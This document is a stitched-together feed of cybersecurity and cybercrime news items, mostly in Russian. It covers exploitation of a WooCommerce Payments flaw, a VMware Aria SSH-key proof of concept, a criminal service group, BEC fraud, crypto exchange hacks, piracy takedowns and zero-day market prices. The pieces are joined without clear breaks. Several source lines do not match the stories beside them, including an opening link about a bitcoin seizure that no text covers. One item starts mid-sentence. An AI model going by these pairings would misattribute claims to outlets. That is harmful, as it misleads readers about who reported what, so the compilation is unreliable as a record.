source: sfstandard.com/2023/09/09/feds-seize-millions-in-bitcoin-from-young- hacker-accused-of-targeting-northern-california-crypto-execs
Исследователи безопасности зафиксировали более 1 млн. попыток компрометации популярного плагина WordPress за последние несколько дней. По данным компании Wordfence, атаки начались в пятницу 14 июля и продолжались в выходные дни, достигнув пика в 1,3 млн. атак на 157 000 сайтов 16 июля.
В Wordfence заявили, что в атаках использовалась критическая уязвимость плагина WooCommerce Payments CVE-2023-28121 (CVSS: 9.8) . Ошибка позволяет злоумышленнику, не прошедшему проверку подлинности, отправлять запросы от имени пользователя с повышенными правами, например, с правами администратора. Уязвимость плагина WooCommerce Payments была исправлена 23 марта в версии 5.6.2.
В случае эксплуатации рассматриваемая уязвимость позволит удаленному злоумышленнику получить права администратора и захватить контроль над уязвимым сайтом WordPress. В Wordfence заявили, что злоумышленники пытались использовать права администратора для удаленной установки плагина WP Console на сайты-жертвы. Хакеры используют плагин WP Console для выполнения вредоносного кода и размещения загрузчика файлов, чтобы обеспечить постоянство.
Хотя количество зафиксированных попыток атак превысило 1 миллион, в Wordfence заявили, что кампания является целенаправленной. По словам экспертов, в отличие от многих других крупномасштабных кампаний, которые обычно атакуют миллионы сайтов без разбора, эта нацелена на меньший набор веб-сайтов.
Примечательно то, что за несколько дней до основной волны атак наблюдалось увеличение числа запросов на перечисление плагинов, которые искали файл «readme.txt» в директории «wp-content/plugins/woocommerce-payments/». Файлы «readme.txt» часто содержат информацию о версии плагина, что может быть использовано злоумышленниками для определения уязвимых версий плагинов на затронутых сайтах.
Ранее специалисты ИБ-компании Patchstack обнаружили уязвимость в плагине WooCommerce Stripe Gateway для WordPress, которая позволяет неавторизованному злоумышленнику просматривать детали заказа, размещенного через плагин. Раскрытие данных может привести к дальнейшим атакам, таким как попытки захвата учетных записей и кражи учетных данных через целевые фишинговые электронные письма.
Кроме того, в июле была обнаружена уязвимость в плагине для WordPress под названием «Ultimate Member», которая позволяет злоумышленнику создавать новые учетные записи пользователей с административными привилегиями, давая хакеру возможность полностью контролировать зараженные сайты.
В судебном заседании, проводившемся недавно в Верховном суде провинции Саскачеван, Канада, судья принял решение , которое может серьезно изменить правила современных бизнес-коммуникаций. По его мнению, использование эмодзи «большой палец вверх» может быть приравнено к юридической подписи. В основе дела лежал спор о неисполненном контракте, из-за которого простому фермеру пришлось заплатить штраф в размере 82 000 канадских долларов (около 4,6 миллионов рублей).
История началась в марте 2021 года, когда Кент Миклборо, продавец зерна из компании South West Terminal, рассылал массовые текстовые сообщения клиентам с предложением купить 86 тонн льна по цене 17 канадских долларов (около 960 рублей) за бушель. Миклборо и фермер Крис Ахтер вели переговоры по телефону. Затем Крис получил в мессенджере сообщение с условиями контракта и просьбой подтвердить их. Фермер отреагировал с помощью эмодзи «большой палец вверх».
Однако в ноябре, когда пришло время поставок, Крис не выполнил свои обязательства. Цены на лён успели увеличиться, поэтому от покупки пришлось отказаться. Так начался спор о толковании эмодзи «большой палец вверх». Миклборо был уверен, что эмодзи подразумевало согласие Ахтера с условиями контракта: другие договоры уже заключались с помощью текстовых сообщений.
Ахтер утверждал в суде: времени прочесть контракт на лён не было, и он просто хотел подтвердить, что получил текстовое сообщение от Миклборо. Во время слушания адвокат фермера возражал против опроса его клиента о значении эмодзи, заявив, что Крис «не является экспертом в этой области».
Судья Тимоти Кин, рассматривая дело, опирался на определение «большого пальца вверх» с портала dictionary.com. В своем решении он отметил: «Этот суд с готовностью признает, что данный эмодзи является нетрадиционным методом “подписать” документ, но, тем не менее, в данных обстоятельствах это был допустимый способ подтвердить сразу две цели». Он также отклонил аргументы защиты о том, что признание эмодзи «большой палец вверх» в качестве юридической подписи «откроет шлюзы» для новых интерпретаций других эмодзи. Например, «кулак» или «рукопожатие».
Кин подчеркнул, что суд не может (и не должен) пытаться остановить прилив технологий и разнообразных методов коммуникации, особенно в мессенджерах. Это новая реальность, и суды должны быть готовы принять новые вызовы, в том числе связанные с использованием эмодзи и подобных им символов.
source:
theguardian.com/world/2023/jul/06/canada-judge-thumbs-up-emoji-sign-contract
canlii.org/en/sk/skkb/doc/2023/2023skkb116/2023skkb116.html
Кто стоит за высококвалифицированной группой с уникальными возможностями.
Согласно отчету Cyberint , новая банда киберпреступников утверждает, что имеет контакты в правоохранительных органах в Европе.
«Всем привет, мы добавляем новую услугу на этот рынок.
(имеем доступ к базе данных полиции в Германии)
С помощью наших связей в полицейском участке мы можем проверять и искать личную информацию о людях», - объявила группа Atlas Intelligence Group (Atlantis Cyber Army).
«Эта возможность впечатляет не только из-за потенциальной информации, которую можно получить. Она показывает, насколько глубоко заходит группа, поскольку они привержены своей преступной организации не только в киберпространстве»
Click to expand...
сказала Cyberint.

Помимо хороших связей, группа Atlas универсальна. Atlas предоставляет следующие услуги:
утечки правительственных баз данных за €15 за штуку;
DDoS-атаки по €20 евро за жертву;
взлом панели управления и первоначальный доступ к более крупным целям,
например, корпорациям за более $1000.
Большую часть этой работы выполняют «кибернаемники», нанятые группой Atlas, которая никогда не раскрывает истинную личность злоумышленников. «Atlas часто набирает людей с определенными способностями, которые им придется использовать повторно, и все участвуют в кампании». Видимо, только главари банды имеют доступ к полной информации о преступных кампаниях группы.
«Этот метод создает сегрегацию между участниками и держит всех, кто выполняет «грязную работу», в неведении. Применение этой техники обеспечивает высокий уровень операционной безопасности для операторов и помогает им избежать постоянных контактов с другими субъектами угроз»
Click to expand...
заявила команда Cyberint.
Для набора кибернаемников Atlas использует Telegram-каналы. В одном из них подписчики могут предлагать свои услуги. Так группа может найти Red Team специалистов, социальных инженеров, разработчиков вредоносных программ и информацию об определенных лицах. Утверждается, что автором канала является некий Mr Eagle, которого Cyberint считает вдохновителем Atlas.
Другой канал используется для того, чтобы обмануть или разоблачить мошенников и педофилов, раскрывая их личную информацию. На канале также описываются предстоящие кампании. Обман других мошенников означает, что Mr Eagle тщательно защищает свою команду от обмана.
«Лидер группы кажется очень зрелой и профессиональной фигурой, поскольку его решения и поведение логичны и не допускают ошибок. Mr Eagle придерживается очень строгих правил, включая запрет рекламы продукции других злоумышленников. Похоже, что Mr Eagle является очень уважаемым и надежным специалистом среди последователей группы»
Click to expand...
написала Cyberint, описывая Mr Eagle как «уникальную личность».
Высокий уровень профессионализма свидетельствует о том, что основные участники Atlas ранее работали на другие группировки или вместе с ними, а затем создали свои собственные. По словам Cyberint, Atlas не нацелен на конкретную страну или организацию, а «работает по всему миру, проводя любую кампанию, которая будет наиболее выгодной». Количество наемников банды растет с каждым днем, поэтому «вступление» в сектор программ-вымогателей является «всего лишь вопросом времени».
source: cyberint.com/blog/research/atlas-intelligence-group
Супруги отрицают какие-либо правонарушения.
Мо Абушерд (Moe Abourched) и Катерина Абуршед (Kateryna Abourched) подозреваются в осуществлении мошеннической схемы, в ходе которой они обманом заставили школьный округ в штате Мичиган (США) перевести большую сумму денег на банковский счет своего калифорнийского маникюрного салона.
По словам полиции, округ и налогоплательщики стали жертвами online- мошенничества под названием BEC-атака (business email compromise – компрометация деловой почты). В ходе мошеннической операции было украдено $2,8 млн. Банки смогли отозвать около половины этой суммы после того, как мошенничество было раскрыто. Супруги отрицают какие-либо правонарушения.
Согласно судебным документам, неизвестный хакер взломал учетную запись электронной почты одного из сотрудников отдела кадров школьного округа и через электронные письма убедил коллегу из финансового отдела сменить банковский счет, на который отправлялись медицинские страховые выплаты. Электронные письма были краткими и вежливыми.
Полиция отследила перевод денег на банковский счет салона, принадлежащий семье Абуршед. После обнаружения кражи Мо Абуршед связался с полицией и сказал, что европейская женщина по имени Дора обманом заставила его принять средства и перевести их на другие счета. Как сообщил агент секретной службы информагентству AFP, утверждения Абуршеда являются ложными, и он использовал аналогичную уловку после BEC-атаки на складскую компанию во Флориде.
«Мои клиенты стали невольными жертвами этой схемы», — сказал адвокат Абушедов Кевин Грес (Kevin Gres).
Мошенники BEC используют различные методы для взлома законных учетных записей корпоративной электронной почты и обманом заставляют сотрудников отправлять электронные платежи или совершать покупки. Целенаправленные фишинговые электронные письма являются распространенным типом атак, но эксперты говорят, что мошенники быстро научились правдоподобно выдавать себя за руководителей компании и оказывать влияние на подчиненных.
В течение многих лет как мошенничество BEC, так и атаки программ-вымогателей рассматривались в основном как проблема правоохранительных органов. Это по- прежнему верно для атак BEC, но программы-вымогатели теперь являются ключевой проблемой национальной безопасности после серии разрушительных атак на критически важную инфраструктуру.
В конце 2020 года администрация торрент-трекера RuTracker объявила о старте карудфандинговой кампании, средства от которой пойдут на покупку жестких дисков, необходимых для сохранения раздач. Напомню, что доступ к ресурсу в РФ заблокирован с 2015 года по решению Мосгорсуда.
«Наш трекер стал своего рода уникальной библиотекой не только популярного, но и редчайшего материала, собранного и поддерживаемого вами, нашими пользователями – сообществами авторов и релизеров, модераторов и хранителей, энтузиастами, сторонниками свободного обмена информацией, — пишут администраторы. — Чрезвычайно важно постараться сохранить Рутрекер как доступную коллекцию разнообразного контента, иного доступа к которому зачастую уже не существует. Однако блокировка ресурса оказывает негативное влияние и ставит под угрозу многообразие существующего на портале материала. Данное ограничение лишает все большее количество наших пользователей возможности полноценно участвовать в файлообмене и поддерживать тем самым жизнь и развитие трекера».
Click to expand...
Ставя перед собой цель — сохранить имеющийся уникальный контент и обеспечить доступ к нему, администраторы объявили сбор средств на жесткие диски для поддержки малосидируемых раздач.
Такие раздачи уже более 10 лет поддерживает группа «Хранители», которая добровольно хранит на своих устройствах 1 520 000 раздач с малым количеством сидов общим объемом 2470 Тб (это примерно 620 жестких дисков по 4 Тб или почти 6 000 000 рублей). Сообщается, что в день эта группа раздает 100-150 Тб на редких раздачах, но личные ресурсы и возможности людей ограничены, и энтузиасты попросту не успевают спасать все исчезающие раздачи.
В итоге было принято решение попытаться собрать 25 000 долларов, которых хватит на покупку HDD суммарным объемом 600-800 Тб. Собранные деньги обещали распределить между проверенными Хранителями, предоставив им самим решать, какие именно нужды HDD, исходя из наличия свободных SATA-слотов на материнской плате, места в корпусе, запаса по питанию и так далее.
Сбор стартовал 4 января 2021 года, и в настоящее время поставленная цель уже достигнута: пользователи собрали более 2 000 000 рублей. При этом кампания по- прежнему активна, то есть пользователи могут продолжать помогать ресурсу и далее.
Источник: xakep.ru/2021/02/26/rutracker-crowdfunding/
Malicious browser extensions are increasingly being used to infect millions of users across the world to monitor their browsing activity, exfiltrate stolen data, send malicious commands, and more.
В ходе международной операции Taken Down была ликвидирована крупнейшая пиратская стриминговая сеть, обслуживавшая более 22 миллионов пользователей по всему миру. Ежемесячный доход нелегального сервиса превышал €250 миллионов, а ущерб от деятельности сервиса оценен в €10 миллиардов в год.
Контент включал трансляции ведущих платформ, включая Sky, Dazn, Mediaset, Amazon Prime, Netflix, Disney+ и Paramount. Нелегальные трансляции включали IPTV, прямые эфиры и контент по запросу (on-demand content), которые предоставлялись пользователям через множество стриминговых сайтов. При этом домены для стриминга не были раскрыты.
Пиратский контент продавался через обширную сеть дистрибьюторов и посредников. Также были обнаружены многочисленные сайты, форумы и группы в соцсетях, где продавались подписки на пиратские трансляции. Каналы заблокированы, а доступ к незаконному контенту прекращён. В результате операции удалось изъять более 2 500 нелегальных каналов и серверов, включая 9 серверов в Румынии и Гонконге, что составило значительную часть нелегальных потоков в Европе.
В ходе расследования удалось установить, что сеть управлялась транснациональной организацией с четкой иерархической структурой. Три главных администратора IT-инфраструктуры были обнаружены в Англии и Нидерландах. На территории Италии было выявлено 80 панелей управления стримингом для IPTV- каналов.
Расследование длилось 2 года. В ходе работы выяснилось, что участники сети использовали зашифрованные приложения для связи, поддельные документы и фиктивные личности, чтобы скрыться от правоохранителей. Задержанным предъявлены обвинения в незаконной трансляции аудиовизуального контента, несанкционированном доступе к системам, компьютерном мошенничестве и отмывании денег.
В операции приняла участие полиция Италии, а также коллеги из 14 стран, включая Великобританию, Нидерланды, Швецию, Швейцарию, Румынию, Хорватию и Китай. Всего было проведено 89 обысков в 15 регионах Италии и 14 дополнительных рейдов за пределами страны. В рамках международного сотрудничества хорватская полиция арестовала 11 подозреваемых. Кроме того, правоохранительные органы конфисковали криптовалюту на сумму более €1,65 миллиона, а также наличные средства в размере €40 000.
• Source: https://www.commissariatodips[.]it/notizie/articolo/comunicato- stampa-operazione-taken-down/index.html
Tether представили новую криптовалюту, обеспеченную ценой золота — Alloy (aUSDT).
Токен называется XAUT и он привязан к настоящим золотым слиткам, которые хранятся в швейцарском банке.
Британская криптовалютная биржа Lykke свернула все операции из-за «инцидента безопасности», который привел к потере $22 млн.
Первым на возможный взлом обратил внимание ончейн-исследователь SomaXBT. По его данным, атака произошла 4 июня, а спустя два дня на сайте платформы появилось сообщение об остановке работы «до следующего уведомления».
__https://twitter.com/x/status/1799812652610511043
Совместно с разработчицей MetaMask Тейлор Монахан исследователю удалось выявить четыре связанных с хакером кошелька в сетях биткоина и Ethereum.
Согласно ончейн- данным, преступник почти сразу же конвертировал ETH в стейблкоин DAI, а BTC распределил по нескольким адресам.
Совокупный объем торгов на Lykke за последний месяц составил около $2,5 млн. Ее пользователи в настоящее время не могут вывести активы с платформы. Некоторые сообщают о нулевых балансах.
__https://twitter.com/x/status/1799321680277602631
При этом представители биржи не оставили официальных комментариев, кроме плашки на сайте и уведомления о приостановке работы по электронной почте.
В комментарии для [DLNews](https://www.dlnews.com/articles/defi/little-known- crypto-exchange-suffers-22-million-dollar- hack/?utm_source=twitter&utm_medium=organic_social&utm_campaign=), генеральный директор Lykke Ричард Олсен заявил, что компания «все еще расследует причины инцидента».
«Тем временем вы можете быть уверены, что ваши средства в безопасности. Lykke — диверсифицированная компания с сильными резервами капитала», — уточнил он.
В результате оперативно-розыскных мероприятий сотрудники ГУ МВД России по г. Санкт-Петербургу и Ленинградской области пресекли деятельность группы, специализировавшейся на хищениях денежных средств под видом реализации средств индивидуальной защиты. Установлено, что злоумышленники с лета 2020 года создали более 10 сайтов и несколько страниц в социальной сети под видом интернет-магазинов по продаже масок, перчаток и антисептиков.
В связи с высокой востребованностью предлагаемого ассортимента товаров злоумышленники вводили в заблуждение граждан и представителей юридических лиц, предлагали сделать заказ продукции, получая полную либо частичную оплату. При этом ни один товар клиенту поставлен в итоге не был, так как в действительности никакого отношения злоумышленники в торговле не имели. Примечательно, что с целью продвижения «магазинов» в интернет-пространстве была организована агрессивная реклама, которая позволила вывести указанные ресурсы в топ-рейтинги поисковых систем российского сегмента сети Интернет.
Жертвами мошенничества становились как физические, так и юридические лица из разных регионов России. В среднем денежный перевод в качестве предоплаты или полной суммы оплаты составлял 50-100 тысяч рублей.
Сотрудниками полиции на территории Санкт-Петербурга и Великого Новгорода по местам проживания задержаны шесть активных участников данной группы – пять мужчин и женщина, в возрасте от 19 до 40 лет.
По оперативной информации, возглавлял группу 37-летний житель Великого Новгорода, остальные же соучастники базировались в Петербурге. По имеющимся данным, предполагаемый организатор привлек в преступную схему двух своих знакомых – братьев из Петербурга, один из которых ранее судим за кражу. Последние подбирали так называемых «дропов» - граждан, на которых в последующем регистрировались фиктивные юридические лица и открывались банковские счета. Именно на имя этих организаций клиенты переводили денежные средства в счет оплаты товара. Затем еще один из соучастников оформлял на себя расчетные счета этих организаций, а банковские карты передавал еще двоим фигурантам – мужчине и женщине, которые обналичивали в банкоматах похищенные денежные средства потерпевших, а затем переводили уже на личные банковские счета.
На текущий момент установлена причастность данной группы к 15 эпизодам мошенничества на общую сумму около 1 миллиона рублей. География преступлений распространилась на всю страну: 9 обманутых клиентов - из Петербурга, а остальные эпизоды зафиксированы в Хабаровске, Тольятти, Нальчике, Череповце, Белгородской и Тульской областях.
У полиции есть основания полагать, что на счету злоумышленников может быть как минимум еще 20 подобных эпизодов на сумму не менее 400 тысяч рублей.
По всем установленным фактам следственными подразделениями территориальных органов МВД России возбуждены уголовные дела по части 2 статьи 159 УК РФ. Двое фигурантов заключены под стражу, остальным четверым избрана мера пресечения в виде подписки о невыезде и надлежащем поведении. Полиция продолжает работу над установлением всех эпизодов преступной деятельности данных лиц.
• Video: мвд.рф/news/item/23030959/
French software company Centreon said today that none of its paid customers
were the victims of a years-long hacking campaign that [came to light on
Monday](https://www.zdnet.com/article/france-russian-state-hackers-targeted-
centreon-servers-in-years-long-campaign/).
Exposed in a report published by ANSSI, France's cyber-security agency, the
hacking campaign lasted between 2017 and 2020, and targeted companies running
Centreon's primary product, a software package of the same name, used for
monitoring IT resources inside large companies.
Hackers, believed to be linked to the Russian government, breached companies running the software and installed malware to perform silent surveillance.
But in a press release today, Centreon said that none of its primary commercial customers were hit in these attacks. Only companies that downloaded the open-source version of the Centreon app, which the company freely provides on its website, were impacted, Centreon said.
"According to discussions over the past 24 hours with ANSSI, only about fifteen entities were the target of this campaign, and that they are all users of an obsolete open source version (v2.5.2), which has been unsupported for 5 years," [the French company said today](https://www.centreon.com/en/company/newsroom/press-releases/centreon- provides-clarification-following-the-publication-of-the-anssi-report/).
Released in November 2014, Centreon said companies deployed the outdated version "without respect for the security of servers and networks."
"Since this version, Centreon has released eight major versions," the company said.
Centreon, who declined to comment yesterday, immediately after the ANSSI report's release, had to issue a statement to prevent its reputation from being impacted, similar to how companies have started abandoning the SolarWinds Orion IT monitoring platform following news of a [major security breach last December](https://www.zdnet.com/article/microsoft-fireeye-confirm- solarwinds-supply-chain-attack/).
On its website, Centreon lists customers such as Airbus, Agence France Press, Euronews, Orange, Lacoste, Sephora, ArcelorMittal, Total, SoftBank, Air France KLM, and several French government agencies and city governments.
However, none of these appear to have been attacked, according to Centreon. Furthermore, according to the ANSSI report, the cyber-security agency also said the attackers targeted web hosting companies primarily.
The French cyber-security agency also drew some thin lines between the attacks and a hacking group known as Sandworm, linked last year by the US government to Unit 74455 of the Russian Main Intelligence Directorate (GRU), a military intelligence agency part of the Russian Army.
The connection between the attacks and Sandworm was the use of Exaramel, a type of multi-platform backdoor trojan that the attackers installed on servers after gaining a foothold via the Centreon software.
Costin Raiu, Director of the Global Research and Analysis Team (GReAT) at Kaspersky Lab, also said on Monday that Sandworm was the only group seen using the Exaramel malware described in the ANSSI report, confirming the agency's report.
Жительница Флориды и ее дочь обвиняются во взломе школьной информационной системы с целью подделать результаты конкурса.
Власти США раскрыли большой «заговор» по подделке результатов голосования. Однако речь идет отнюдь не о попытках «русских» или каких-либо еще хакеров вмешаться в выборы президента США, а о страстном стремлении матери сделать свою дочь королевой школы.
В октябре 2020 года помощница директора средней школы Tate High School в городе Кантонмент (штат Флорида) Лора Роуз Кэрролл (Laura Rose Carroll) решила пойти по стопам хакеров, чтобы помочь своей дочери-старшекласснице Эмили Роуз Гроувер (Emily Rose Grover) стать самой популярной девочкой в школе.
50-летняя Кэрролл и ее 18-летняя дочь обвиняются во взломе школьной информационной системы с целью подделать результаты конкурса на звание школьной королевы. Несмотря на то, что матери удалось обеспечить своей любимице желанную победу, девочке не суждено было насладиться ею из-за ареста. Спустя несколько недель после оглашения результатов конкурса Управление полиции Флориды стало разбираться, была ли победа Гроувер честной.
Полиция начала расследование после того, как ей стало известно о несанкционированном доступе к школьной информационной системе FOCUS и изменении голосов в пользу Гроувер. Как оказалось, 117 голосов были внесены с одного IP-адреса за короткий период времени. Правоохранители обнаружили свидетельства того, что несанкционированный доступ к системе был осуществлен со смартфона Кэрролл и ее домашнего компьютера.
Мать и дочь были арестованы в марте нынешнего года. Хотя на момент предположительного совершения преступления Гроувер еще не было 18-ти лет, сейчас ей предъявлены обвинения как совершеннолетней. В случае признания ее виновной, девушка может получить 16 лет тюрьмы.
По словам одноклассников, еще до конкурса Гроувер регулярно использовала телефон матери для доступа к данным (в том числе к оценкам и результатам тестирований) учащихся, хранящимся в системе FOCUS.
Генеральный директор одного из крупнейших криптовалютных маркетмейкеров Wintermute сообщил, что компания подверглась взлому. Злоумышленникам удалось вывести активы на $160 млн.
Евгений Гаевой подчеркнул, что взлому подверглись лишь системы, связанные с проектами децентрализованных финансов (DeFi). Системы предоставления ликвидности для внебиржевых сделок и централизованных криптовалютных площадок остались невредимы. При этом компания остается платежеспособной, так как объем собственного капитала Wintermute вдвое превышает украденную сумму.
«Хакеры получили доступ к 90 активам, но их запасы у нас были не слишком велики. На сумму свыше $1 млн у нас хранилось лишь 2 актива, а свыше $2.5 и вовсе не было. Поэтому не стоит ожидать массовых распродаж и падения курсов. Мы свяжемся с командами этих проектов как можно быстрее. Если вы предоставляли нам средства, то они в безопасности, однако, если вы захотите вывести деньги, мы беспрекословно сделаем это», – подчеркнул генеральный директор Wintermute.
Также Евгений Гаевой отметил, что в ближайшие дни возможны перебои в предоставлении сервисов, однако чуть позже все вернется в норму. Он обратился к хакерам, взломавшим компанию, с просьбой связаться с представителями Wintermute в качестве «белых хакеров». То есть, если злоумышленники вернут большую часть украденных средств, то компания не будет преследовать их по закону.
На прошлой неделе разработчики VMware исправили критическую уязвимость в Aria Operations for Networks (ранее vRealize Network Insight), связанную с обходом SSH-аутентификации. После анализа патча, специалист Summoning Team создал PoC- эксплоит для свежей проблемы.
Уязвимость получила идентификатор CVE-2023-34039 и набрала 9,8 баллов из 10 возможных по шкале оценки уязвимостей CVSS. Проблема была связана с обходом аутентификации, который, согласно заявлению производителя, возможен в виду отсутствия генерации уникального криптографического ключа.
«Злоумышленник, имеющий сетевой доступ к Aria Operations for Networks, может обойти аутентификацию SSH, чтобы получить доступ к Aria Operations for Networks CLI», — писали разработчики VMware на прошлой неделе.
Click to expand...
То есть эксплуатация CVE-2023-34039 может привести к краже или изменению данных через интерфейс командной строки продукта. В зависимости от конфигурации, такой взлом может повлечь за собой нарушение работы сети, изменение настроек, установку вредоносного ПО и боковое перемещение злоумышленника по сети.
После выхода исправления VMware настоятельно рекомендовала пользователям как можно скорее применить патчи для Aria Operations for Networks версий 6.2, 6.3, 6.4, 6.5.1, 6.6, 6.7, 6.8, 6.9 и 6.10.
Теперь в VMware предупреждают, что код PoC-эксплоита для CVE-2023-34039 уже доступен в сети и появился всего через два дня после раскрытия информации об уязвимости.
[Эксплоит](https://summoning.team/blog/vmware-vrealize-network-insight-rce- cve-2023-34039/) нацелен на все версии Aria Operations for Networks с 6.0 по 6.10, и был создан исследователем Summoning Team Синой Хейрха (Sina Kheirkhah).
По словам эксперта, который отреверсил патчи VMware, первопричиной проблемы являются жестко закодированные SSH-ключи, сохранившиеся после того, как VMware «забыла» их перегенерировать.
Корень проблемы кроется в bash-скрипте, содержащем метод refresh_ssh_keys(), который отвечает за перезапись текущих SSH-ключей для пользователей support и ubuntu в файле authorized_keys. То есть SSH-аутентификация в целом работает, но новые ключи не генерируются, а вместо них используются жестко заданные.
«Интересно, что VMware характеризует эту проблему как обход сетевой SSH- аутентификации. Но SSH-аутентификация на месте, а VMware забыла перегенерировать ключи. VMware Aria Operations for Networks в версиях от 6.0 до 6.10 имеет жестко закодированные ключи. Каждая версия VMware Aria Operations for Networks имеет свой уникальный SSH-ключ, и чтобы создать полнофункциональный эксплоит, мне пришлось собрать все ключи от разных версий продукта», — объясняет исследователь.
Click to expand...
[](https://xakep.ru/wp-
content/uploads/2023/09/435137/CVE-2023-34039_poc.gif)
Работа эксплоита
340k$. Эти счета находились в пяти банках ОАЭ, три в Катаре, один в Австралии.
Эти деньги с помощью 306 транзакциями отправили на единый налоговый счет системы государственных выплат Армении. Это якобы для уплаты налогов нескольких предприятий-сообщников. Почти все предприятия были связаны между собой одним учредителем.
Сделки прошли с помощью платежной системы, обслуживаемой одним из местных банков. Через некоторое время в банк поступили жалобы из-за рубежа - от владельцев счетов, ставших жертвами мошенничества. Часть денег была возвращена, остальные остались на налоговых счетах. Далее, согласно законодательству, были поданы заявления на возврат переплат и деньги в чистом виде уже были в руках мошенников. Житель Еревана по данному делу был арестован, а затем выпущен под залог. Его имущество арестовано.
Приватность или общественная безопасность – что важнее в эпоху цифровизации?
Полицейские ведомства Европы выразили обеспокоенность тем, что усиление мер конфиденциальности, таких как применение «сквозного шифрования» (E2EE), может серьёзно ограничить возможности правоохранителей в расследовании преступлений.
По словам представителей Европола, такая технология не позволит технологическим компаниям и правоохранительным органам видеть и использовать данные о нарушениях, происходящих на платформах социальных сетей.
Введение E2EE по умолчанию в приложениях, таких как Messenger от Meta *, начиная с декабря 2023 года, вызвало критику со стороны Национального агентства по борьбе с преступностью Великобритании (NCA). Организация указала, что такие дизайнерские решения затрудняют защиту детей от сексуального насилия в Интернете и ослабляют способность полиции расследовать преступления и обеспечивать безопасность населения.
Генеральный директор NCA, Грэм Биггар, подчеркнул, что шифрование может эффективно защищать пользователей от множества преступлений, но необдуманное внедрение E2EE технологическими гигантами создаёт угрозы для общественной безопасности.
Катрин де Болль, исполнительный директор Европола, добавила, что технологические компании должны нести социальную ответственность за создание безопасной среды, не мешая при этом работе правоохранительных органов.
В совместном заявлении органы подчеркнули, что необязательно полностью отказываться от приватности граждан ради общественной безопасности. В декларации говорится, что существуют технические решения, требующие лишь гибкости со стороны индустрии и правительств.
Meta, несмотря на внедрение E2EE в свои продукты, нашла компромиссный способ борьбы с эксплуатацией детей, например, в WhatsApp. А недавно компания также объявила о пилотной программе в Instagram для защиты молодежи от сексторции и злоупотребления интимными изображениями. При этом безопасность и приватность переписки не нарушается, так как контент анализируется прямо на устройстве конечных пользователей.
sc:
europol.europa.eu/media-press/newsroom/news/european-police-chiefs-call-for-
industry-and-governments-to-take-action-against-end-to-end-encryption-roll-out
faq.whatsapp.com/5704021823023684
Две крупнейшие компании, разрабатывающие графические процессоры и другие полупроводниковые компоненты, Arm и Nvidia, призвали своих клиентов как можно скорее установить патчи безопасности для устранения серии опасных уязвимостей в драйверах GPU.
Базирующаяся в Великобритании Arm сообщила об активно эксплуатируемой уязвимости нулевого дня в программном драйвере Mali GPU Kernel, который обеспечивает взаимодействие операционной системы с графическим процессором Mali. Эта брешь, обозначенная как CVE-2024-4610 , может приводить к некорректной обработке видеопамяти GPU, вызывая сбои, повреждение данных или несанкционированный доступ к конфиденциальной информации. В Arm заявили, что уже исправили баг и настоятельно рекомендуют обновить ПО Bifrost и Valhall GPU всем затронутым пользователям.
Это не первый раз, когда исследователи выявляют проблемы в драйверах Arm Mali GPU. В октябре прошлого года компания признала наличие другой уязвимости ( CVE-2023-4211 ), позволяющей хакерам получать доступ к данным на устройствах с Mali GPU. А еще ранее, в 2022 году, эксперт обнаружил баг в том же драйвере, открывавший лазейку для взлома Google Pixel 6.
Американский гигант Nvidia также сообщил о 10 новых серьезных проблемах в своих GPU драйверах для Windows и Linux, а также в программном обеспечении виртуальных GPU (vGPU). Компания призвала всех пользователей срочно скачать и установить обновленные версии для защиты своих систем от потенциальных кибератак.
Одна из обнаруженных уязвимостей в драйверах Nvidia GPU для Windows и Linux, обозначенная как CVE-2024-0090 , может привести к выполнению вредоносного кода, отказу в обслуживании, эскалации привилегий, раскрытию данных и их повреждению. Другой баг CVE-2024-0089 в Nvidia GPU драйвере для Windows открывает возможность утечки информации из предыдущих сессий.
Nvidia также предупредила, что в их vGPU ПО, позволяющем нескольким виртуальным машинам использовать один физический GPU, присутствует уязвимость CVE-2024-0099 . Аналогичным образом, она приводит к раскрытию данных, их изменению, повышению привилегий и отказам в обслуживании.
Две ведущие компании индустрии графических процессоров практически одновременно столкнулись с необходимостью закрытия критических дыр безопасности в своих разработках. Своевременное обновление является крайне важным для предотвращения возможного ущерба.
Преимущественно скрытая в личной переписке, экономика эксплоитов на киберпреступных форумах иногда все же просачивается во внешний мир, проливая свет на толщину кошелька киберпреступников. Некоторые группировки даже заявляют, что в их распоряжении есть многомиллионные суммы, которые они готовы выложить за уязвимости нулевого дня. Тем не менее, и у хакеров с более скромным бюджетом может появиться возможность пользоваться такими уязвимостями, если концепция «эксплоит как услуга» (exploit-as-a-service) станет реальностью.
Очень часто потенциальные покупатели готовы платить за уязвимости, как новые, так и старые, баснословные суммы. К примеру, в начале мая 2021 года один из пользователей киберпреступного форума объявил, что готов заплатить $25 тыс. за PoC-эксплоит для критической уязвимости в Pulse Secure VPN ( CVE-2021-22893 ). Еще один покупатель предложил до $3 млн за уязвимости удаленного выполнения кода в Windows 10 и Linux, эксплуатация которых не требует никаких действий со стороны жертвы (так называемый zero-click).
Этот же пользователь также предложил до $150 тыс. за оригинальное решение, которое позволило бы вредоносному ПО запускаться после каждой перезагрузки Windows 10.
Для сравнения, занимающаяся перепродажей эксплоитов компания Zerodium предлагает за уязвимость zero-click в Windows 10 до $1 млн. Наибольшая сумма, которую она готова заплатить, составляет $2,5 млн за полную цепочку уязвимостей zero-click в Android. За такую же цепочку для iOS компания согласна отдать $2 млн.
Покупатели эксплоитов на черном рынке попали в поле зрения исследователей ИБ- компании Digital Shadows, которые решили подробнее изучить данный вопрос. В ходе исследования им встречались покупатели, готовые купить уязвимости нулевого дня по цене в $10 млн. Более того, такие деньги теперь предлагают не только финансируемые государствами хакеры, но и работающие на себя киберпреступники, жаждущие наживы, в том числе операторы вымогательского ПО.
Как бы то ни было, заключение столь крупной сделки может занять слишком много времени, и за этот период другие разработчики могут предложить свои эксплоиты, что в итоге приведет к снижению цены. Поэтому киберпреступники начали обсуждать концепцию «эксплоит как услуга». Суть ее заключается в том, чтобы разработчики эксплоитов могли сдавать свои инструменты в аренду сразу нескольким партнерам. Такое решение позволило бы им получать хорошую прибыль, пока не появится достойный покупатель. В свою очередь, потенциальные покупатели получат возможность протестировать инструмент и решить, покупать его или нет.
Как и в случае с бизнес-моделью «вредоносное ПО как услуга» (malware-as-as- service), новый сервис позволит менее опытным хакерам осуществлять более сложные атаки.
• Source: [https://www.digitalshadows.com/blog...telligence-whats-the-word-in- dark-web-forums/](https://www.digitalshadows.com/blog-and- research/vulnerability-intelligence-whats-the-word-in-dark-web-forums/)
